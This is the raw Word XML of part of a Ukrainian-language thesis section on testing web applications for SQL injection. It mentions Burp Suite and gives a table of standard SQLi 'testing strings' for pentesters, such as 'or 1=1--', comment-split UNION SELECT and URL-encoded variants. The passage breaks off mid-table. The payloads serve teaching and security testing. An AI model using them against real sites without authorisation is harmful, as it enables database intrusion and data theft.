      <w:r w:rsidRPr="00781B17">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> заголовки і </w:t>
      </w:r>
      <w:r w:rsidRPr="00781B17">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> параметри.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6860393A" w14:textId="1464B892" w:rsidR="008B0B5B" w:rsidRPr="005027FB" w:rsidRDefault="00A419FD" w:rsidP="008B0B5B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00781B17">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00781B17">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Suite</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00781B17">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00781B17">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Suite</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> це веб додаток утиліта для тестування безпеки, що дозволяє атакуючому перевірити і модифікувати трафік між браузером і додатком.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C402479" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00B00F3C" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:left="1080" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73C42CCA" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="001E06E1" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc516752135"/>
      <w:bookmarkStart w:id="61" w:name="_Toc30433119"/>
      <w:r w:rsidRPr="001E06E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.5.3 Тестування на SQL-ін’єкції</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
      <w:bookmarkEnd w:id="61"/>
      <w:r w:rsidRPr="001E06E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F744E2" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00B00F3C" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC74396" w14:textId="44A42FF1" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>У таб</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">лиці </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 наведені стандартні </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, що звуться </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE074B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00B00F3C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE074B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (рядком тестування) використовуються атакуючим для виконання </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Пентестери також використовують </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE074B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>testing</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE074B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> для оцінки стійкості додатку до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Таблиця показує різні можливості для кожного рядка тестування. Рядок </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE074B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>testing</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE074B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> відомий як шпаргалка для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Пентестер може використати цю шпаргалку для тестування на вразливість до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [2</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00962467" w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Закінчення таблиці 2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3369DCB5" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="0068107F" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F44E67D" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="0068107F" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Таблиця 2.1</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9932" w:type="dxa"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="3969"/>
        <w:gridCol w:w="1560"/>
        <w:gridCol w:w="2125"/>
        <w:gridCol w:w="10"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A419FD" w:rsidRPr="00D84A48" w14:paraId="1023000F" w14:textId="77777777" w:rsidTr="00962467">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="10" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9922" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="114B4858" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="008945BB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="709"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE074B">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Testing</w:t>
            </w:r>
            <w:r w:rsidRPr="00781B17">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BE074B">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>String</w:t>
            </w:r>
            <w:r w:rsidRPr="00D84A48">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> для </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A419FD" w:rsidRPr="00D84A48" w14:paraId="6E73AEE6" w14:textId="77777777" w:rsidTr="00962467">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29C5F9BF" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00781B17" w:rsidRDefault="00A419FD" w:rsidP="008945BB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00781B17">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>||6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B0AD401" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00781B17" w:rsidRDefault="00A419FD" w:rsidP="008945BB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>or</w:t>
            </w:r>
            <w:r w:rsidRPr="00781B17">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1=1--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5973E601" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00781B17" w:rsidRDefault="00A419FD" w:rsidP="008945BB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00781B17">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>%22+</w:t>
            </w:r>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>or</w:t>
            </w:r>
            <w:r w:rsidRPr="00781B17">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>isnull</w:t>
            </w:r>
            <w:r w:rsidRPr="00781B17">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>%281%2</w:t>
            </w:r>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r w:rsidRPr="00781B17">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>0%29+%2</w:t>
            </w:r>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r w:rsidRPr="00781B17">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E4BA4AE" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00781B17" w:rsidRDefault="00A419FD" w:rsidP="008945BB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00781B17">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>‘/**/</w:t>
            </w:r>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OR</w:t>
            </w:r>
            <w:r w:rsidRPr="00781B17">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>/**/1/**/= /**/1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2135" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46F98BC4" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00E67FDB" w:rsidRDefault="00A419FD" w:rsidP="008945BB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>UNI</w:t>
            </w:r>
            <w:r w:rsidRPr="00781B17">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>/**/</w:t>
            </w:r>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ON</w:t>
            </w:r>
            <w:r w:rsidRPr="00781B17">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SEL</w:t>
            </w:r>
            <w:r w:rsidRPr="00781B17">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>**/ECT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962467" w:rsidRPr="00C86D02" w14:paraId="254FA3EC" w14:textId="77777777" w:rsidTr="00962467">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36CFF887" w14:textId="32B07531" w:rsidR="00962467" w:rsidRPr="00781B17" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>‘||’6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="637E1F3E" w14:textId="368C9E1C" w:rsidR="00962467" w:rsidRPr="00E67FDB" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>“or””a”=”a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7881834F" w14:textId="4B9A72AF" w:rsidR="00962467" w:rsidRPr="00781B17" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67FDB">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">‘group by userid having 1=1-- </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B975C39" w14:textId="7F2E8D98" w:rsidR="00962467" w:rsidRPr="00781B17" w:rsidRDefault="00962467" w:rsidP="00962467">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
